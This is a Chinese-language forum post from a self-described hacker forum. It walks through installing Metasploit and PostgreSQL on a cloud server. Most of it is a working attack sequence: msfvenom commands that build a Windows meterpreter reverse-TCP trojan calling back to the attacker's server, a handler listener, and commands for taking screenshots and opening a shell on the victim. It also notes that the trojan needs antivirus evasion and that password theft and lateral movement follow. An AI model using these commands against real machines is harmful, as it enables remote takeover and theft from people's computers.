• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

云服务器上安装MSF环境


This Wind

Recommended Posts

在校园网内,禁止使用路由器之类的,所以就导致自己本地虚拟机环境出现各种各样的网络问题,解决起来过于繁琐,为此在服务器上安装MSF

metasploit

0x00 安装MSF

使用Xshell等工具连上远程服务器后,首先确保服务器的网络是可以正常访问外网的

使用curl http://dyboy.cn 测试一下

网络没问题,接下来命令如下

// 切换目录
cd /home

// 获取MSF安装脚本
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

// 修改权限
chmod 755 msfinstall

// 开始安装
./msfinstall

等待一会儿就安装好了,服务器的入网带宽是非常高的,即服务器的下载速度很快


0x01 安装postgresql

因为MSF需要记录一些数据,依赖于postgresql,因此还需要安装

同样在当前home目录下

// 获取安装
apt-get install postgresql

// 切换到postgres用户
su postgres

// 登录postgresql数据库,首次登录没有密码
psql

// 修改数据库用户postgres的密码
\password postgres

// 退出
\q

// 初始化
msfdb init

0X02 MSF初体验

// 生成小马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe

// 进入msf
msfconsole

// 监听
use exploit/multi/handler

// 设置payload
set payload windows/meterpreter/reverse_tcp

// 设置
set LHOST 0.0.0.0

set LPORT 服务器监听端口

// 运行
run

在实际环境当中还需要对小马文件编码免杀等操作

本地电脑执行test.exe文件

服务端获取会话

获取会话

获取到的是以当前执行木马用户的身份

会话身份

// 将会话维持
background

// 罗列会话
sessions

// 进入会话
sesions 会话id

// 获取目标主机屏幕截图
screenshot

// 进入目标主机的Shell
shell

// 退出shell
exit

// 更多内容可以通过帮助查看
help

后续就是提权、抓密码、横向渗透的事情了

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now